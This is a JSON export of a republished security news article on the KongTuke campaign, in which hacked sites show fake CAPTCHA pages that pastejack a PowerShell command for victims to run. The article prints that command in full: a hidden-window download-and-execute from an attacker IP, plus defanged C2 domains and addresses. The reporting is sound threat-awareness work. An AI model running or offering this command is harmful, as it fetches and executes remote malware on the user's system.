{"id":3096,"date":"2025-04-06T10:04:52","date_gmt":"2025-04-06T10:04:52","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/04\/06\/clipboard-hijacking-a-fake-captcha-leverage-pastejacking-script-via-hacked-sites-to-steal-clipboard-data\/"},"modified":"2025-04-06T10:04:52","modified_gmt":"2025-04-06T10:04:52","slug":"clipboard-hijacking-a-fake-captcha-leverage-pastejacking-script-via-hacked-sites-to-steal-clipboard-data","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/04\/06\/clipboard-hijacking-a-fake-captcha-leverage-pastejacking-script-via-hacked-sites-to-steal-clipboard-data\/","title":{"rendered":"\u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data"},"content":{"rendered":"<p>    \u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated new cyberattack chain dubbed \u201cKongTuke\u201d has been uncovered by cybersecurity researchers, targeting unsuspecting internet users through compromised legitimate websites. <\/p>\n<p>Detailed in a report by Bradley Duncan of Palo Alto Networks\u2019 Unit 42 team, this attack leverages malicious scripts and fake CAPTCHA pages to hijack victims\u2019 clipboards and potentially install unidentified malware. <\/p>\n<p>The findings were shared on April 4, 2025, with additional insights posted on X by Unit 42 Intel, highlighting the growing threat of this campaign.<\/p>\n<figure class=\"wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter\">\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\">\n<p lang=\"en\" dir=\"ltr\">2025-04-04 (Friday): Injected <a href=\"https:\/\/twitter.com\/hashtag\/KongTuke?src=hash&amp;ref_src=twsrc%5Etfw\">#KongTuke<\/a> script in pages from legitimate but compromised websites leads to fake <a href=\"https:\/\/twitter.com\/hashtag\/CAPTCHA?src=hash&amp;ref_src=twsrc%5Etfw\">#CAPTCHA<\/a> style pages and <a href=\"https:\/\/twitter.com\/hashtag\/ClipboardHijacking?src=hash&amp;ref_src=twsrc%5Etfw\">#ClipboardHijacking<\/a> (<a href=\"https:\/\/twitter.com\/hashtag\/pastejacking?src=hash&amp;ref_src=twsrc%5Etfw\">#pastejacking<\/a>). These pages ask users to paste malicious script into a Run window. Latest info at <a href=\"https:\/\/t.co\/EFqwiGYH40\">https:\/\/t.co\/EFqwiGYH40<\/a> <a href=\"https:\/\/t.co\/gsDqluwNKF\">pic.twitter.com\/gsDqluwNKF<\/a><\/p>\n<p>\u2014 Unit 42 (@Unit42_Intel) <a href=\"https:\/\/twitter.com\/Unit42_Intel\/status\/1908253830166323637?ref_src=twsrc%5Etfw\">April 4, 2025<\/a>\n<\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n<\/div>\n<\/figure>\n<h2 class=\"wp-block-heading\"><strong>The Attack Chain<\/strong><\/h2>\n<p>The KongTuke attack begins with a malicious script injected into legitimate but vulnerable websites. One such example cited in the report is hxxps:\/\/lancasternh[.]com\/6t7y.js, which redirects users to a secondary script at hxxps:\/\/lancasternh[.]com\/js.php. <\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgS0iQXSuhCM92yf5idXoU_6zZlC3IAv0Pk-MjSFOZGxIGAvjCh4l37nr12B5-Gsnd68r2rMUe4ThdmRuUvB4uHg81J4Dv89-nYMdIVspK7zeAn-fAk6g3L_5krcgI8Xz8T5_cBVm9A2X7z9zyzBIuG5DXf-gRx-T-lfC7dqyNbMogz02MANLboalubTxIm\/s1600\/a.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Injecting Script from compromised websites<\/figcaption><\/figure>\n<p>This script collects detailed information about the victim\u2019s device, including IP address, browser type, and referrer data, encoded in base64 format. <\/p>\n<p>From there, users are led to a deceptive \u201cverify you are human\u201d page mimicking a CAPTCHA, a common security feature meant to distinguish humans from bots.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgWUp88O1X1XkZzyVRyHdzr0V_KYVCG5NDq7aeyQDCmOvLG2Wg31J21Ei-n-IYvJo_1ifiWHhjsPUpQ8whr5VoLQjOaO_7gRqHQ09Z75VLP3p8-OTZgZ43-r8t-BITXs-SNimYvx0xumNlvILPK57nxmod3Qf0A0uLsEtrDXI8lATcKF2lwHP6qPiPSPpS8\/s16000\/b.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">fake CAPTCHA<\/figcaption><\/figure>\n<p>However, this CAPTCHA is a ruse. Instead of verifying identity, the page employs a technique known as \u201cclipboard hijacking\u201d or \u201cpastejacking.\u201d It covertly injects a malicious PowerShell script into the victim\u2019s clipboard, accompanied by instructions urging the user to paste and execute it via a Windows Run window. <\/p>\n<p>The script in question, as detailed by Duncan, is:<\/p>\n<pre class=\"wp-block-code\"><code>powershell -w h -c \"iex $(irm 138.199.156[.]22:8080\/$($z = [datetime]::UtcNow; $y = ([datetime]('01\/01\/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))\"<\/code><\/pre>\n<p>This command connects to a remote server at 138.199.156[.]22:8080, retrieving additional malicious payloads based on a timestamp calculation.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Traffic and Post-Infection Activity<\/strong><\/h2>\n<p>According to the Unit 42 <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">report<\/a>, Once executed, the script initiates a series of network requests. Initial traffic includes GET and POST requests to the same IP address, followed by connections to domains such as ecduutcykpvkbim[.]top and bfidmcjejlilflg[.]top.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhHUWAUCIDGGBEq4zgffUFMcBf95NkHKLvQzZq3THk1XCeymQ8xAZfQoOywjkTMC5jiVOrbjKZ8V6eDeR0IxjPyUEbMcF-UooQgJYNgcji2EEUaJQthIbIPYoW3adLXM9ItDu4pxQ1b4SXQUkTXM-RrnSLoYih2RViLauwkWkZXXszgYqfBdCgq2CnxM17E\/s16000\/C.webp?ssl=1\" alt=\"\"><\/figure>\n<p>These domains, hosted at 185.250.151[.]155:80, appear to serve as staging points for further infection. Post-infection, the compromised system establishes command-and-control (C2) communication with 8qvihxy8x5nyixj[.]top over TLSv1.0 HTTPS traffic via 173.232.146[.]62:25658.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhXQ7hyphenhyphenZSogbi21WsGDBaalhBytuRo8cwWC8PW3N274V2dtqHEsXcLbMsnGmE8TNh1uMBvU-tWpHJmZ4P5-BbGBBeimXSx3NR65d0OkMd98eMsldWODXrH0Otart7mX15a6hD7STICTn_-xH1KvcNA9Grg5VUXhrg5Cr25ICd54W7Nwh9ndJ_wTlafYYCW4\/s16000\/D.webp?ssl=1\" alt=\"\"><\/figure>\n<p>Interestingly, the infected host also performs an IP address check using services like api.ipify[.]org and ipinfo[.]io, gathering geolocation data such as city, region, and country. While this step is not inherently malicious, it suggests the attackers are profiling their victims for targeted exploitation.<\/p>\n<h2 class=\"wp-block-heading\"><strong>A Familiar Yet Elusive Threat<\/strong><\/h2>\n<p>The KongTuke campaign has been tracked by cybersecurity communities, including @monitorsg on Mastodon and ThreatFox, under the hashtag #KongTuke. <\/p>\n<p>Duncan notes that the post-infection traffic bears similarities to patterns observed with AsyncRAT, a well-known remote access trojan. <\/p>\n<p>However, the final malware payload remains unidentified, as researchers have yet to obtain a sample for analysis. This uncertainty underscores the evolving nature of the threat and the challenges in combating it.<\/p>\n<p>Unit 42 Intel took to X on April 4, 2025, to alert the public, stating: \u201cInjected #KongTuke script in pages from legitimate but compromised websites leads to fake #<a href=\"https:\/\/cybersecuritynews.com\/clickfix-captcha-technique-ransomware\/\" target=\"_blank\" rel=\"noreferrer noopener\">CAPTCHA<\/a> style pages and #ClipboardHijacking (#pastejacking).<\/p>\n<p>These pages ask users to paste malicious script into a Run window.\u201d The post, accessible at https:\/\/x.com\/Unit42_Intel\/status\/1908253830166323637, included a link to further details and a visual of the fake CAPTCHA page, emphasizing the urgency of awareness.<\/p>\n<p>Bradley Duncan, the author of the report, highlighted the insidious nature of this attack in his notes: \u201cThis process is sometimes called \u2018clipboard hijacking\u2019 or \u2018pastejacking,\u2019 tricking users into executing harmful code under the guise of a routine verification.\u201d <\/p>\n<p>The use of compromised legitimate websites adds a layer of trust that makes the attack particularly dangerous.<\/p>\n<p>Cybersecurity experts urge users to exercise caution when encountering CAPTCHA prompts, especially those requesting manual script execution. <\/p>\n<p>Legitimate CAPTCHAs typically involve simple tasks like image selection, not copying and pasting code. <\/p>\n<p>Users should also keep their systems updated, avoid clicking suspicious links, and employ robust antivirus software to detect and block such threats.<\/p>\n<p>As the KongTuke campaign continues to evolve, researchers at Unit 42 and beyond are working to identify the final malware and disrupt the attack infrastructure. For now, vigilance remains the best defense against this cunning exploitation of trust in everyday web interactions.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(135deg,rgb(238,238,238) 100%,rgb(169,184,195) 100%)\"><strong>Find this News Interesting! Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqBwgKMOffpwsw1Oq_Aw?hl=en-IN&amp;gl=IN&amp;ceid=IN%3Aen\" target=\"_blank\" rel=\"noreferrer noopener\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener\">LinkedIn<\/a>, and\u00a0<a href=\"https:\/\/x.com\/The_Cyber_News\" target=\"_blank\" rel=\"noreferrer noopener\">X<\/a>\u00a0to Get Instant Updates<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/fake-captcha\/\">\u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Balaji N<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/fake-captcha\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data A sophisticated new cyberattack chain dubbed \u201cKongTuke\u201d has been uncovered by cybersecurity researchers, targeting unsuspecting internet users through compromised legitimate websites. Detailed in a report by Bradley Duncan of Palo Alto Networks\u2019 Unit 42 team, this attack leverages malicious scripts [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63],"tags":[130],"class_list":["post-3096","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3096"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=3096"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3096\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=3096"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=3096"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=3096"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}